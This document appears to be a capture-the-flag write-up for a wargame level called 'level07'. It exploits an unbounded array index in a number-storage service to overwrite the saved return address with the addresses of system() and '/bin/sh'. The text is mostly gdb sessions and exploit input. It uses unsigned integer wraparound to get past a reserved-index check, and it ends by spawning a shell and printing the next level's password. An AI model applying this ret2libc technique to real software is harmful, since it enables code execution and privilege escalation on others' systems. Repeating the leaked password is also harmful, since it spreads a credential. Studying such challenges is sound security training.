In spite of array being size of 100, function store_number and read_number ignore it

./level07 
----------------------------------------------------
  Welcome to wil's crappy number storage service!   
----------------------------------------------------
 Commands:                                          
    store - store a number into the data storage    
    read  - read a number from the data storage     
    quit  - exit the program                        
----------------------------------------------------
   wil has reserved some storage :>                 
----------------------------------------------------

Input command: store
 Number: 21 
 Index: 512
 Completed store command successfully
Input command: store
 Number: 21
 Index: -42
 Completed store command successfully
Input command: read
 Index: 512
 Number at data[512] is 21
 Completed read command successfully
Input command: read
 Index: -42
 Number at data[4294967254] is 134514134
 Completed read command successfully

That means that system '/bin/sh' can be passed

0xf7e6aed0  system    = 4159090384
0xf7f897ec  '/bin/sh' = 4160264172

We need to find offset

(gdb) b * 0x080488ea
Breakpoint 1 at 0x80488ea
(gdb) r
Starting program: /home/users/level07/level07 
----------------------------------------------------
  Welcome to wil's crappy number storage service!   
----------------------------------------------------
 Commands:                                          
    store - store a number into the data storage    
    read  - read a number from the data storage     
    quit  - exit the program                        
----------------------------------------------------
   wil has reserved some storage :>                 
----------------------------------------------------

Input command: store

Breakpoint 1, 0x080488ea in main ()
(gdb) x $esp + 0x24
0xffffd554:     0
(gdb) i  f
Stack level 0, frame at 0xffffd720:
 eip = 0x80488ea in main; saved eip 0xf7e45513
 Arglist at 0xffffd718, args: 
 Locals at 0xffffd718, Previous frame's sp is 0xffffd720
 Saved registers:
  ebx at 0xffffd70c, ebp at 0xffffd718, esi at 0xffffd710, edi at 0xffffd714, eip at 0xffffd71c

0xffffd71c - 0xffffd554 = 0x1c8 = 456, 456 / 4 = 114th position in array

Unfortunatelly this position is reserved

 Index: 114
 *** ERROR! ***
   This index is reserved for wil!
 *** ERROR! ***
 Failed to do store command

Luckily array has unsigned type, so we still can write 114 by overflowing it

0x1c8 + UINT_MAX + 0x1 = 4294967752

Dividing by 4, we get index 1073741938

Input command: store
 Number: 4159090384
 Index: 1073741938
 Completed store command successfully
Input command: store
 Number: 4160264172
 Index: 116
 Completed store command successfully
Input command: quit
$ whoami
level08
$ cat /home/users/level08/.pass
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
$ su level08
Password: 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX disabled   No PIE          No RPATH   No RUNPATH   /home/users/level08/level08
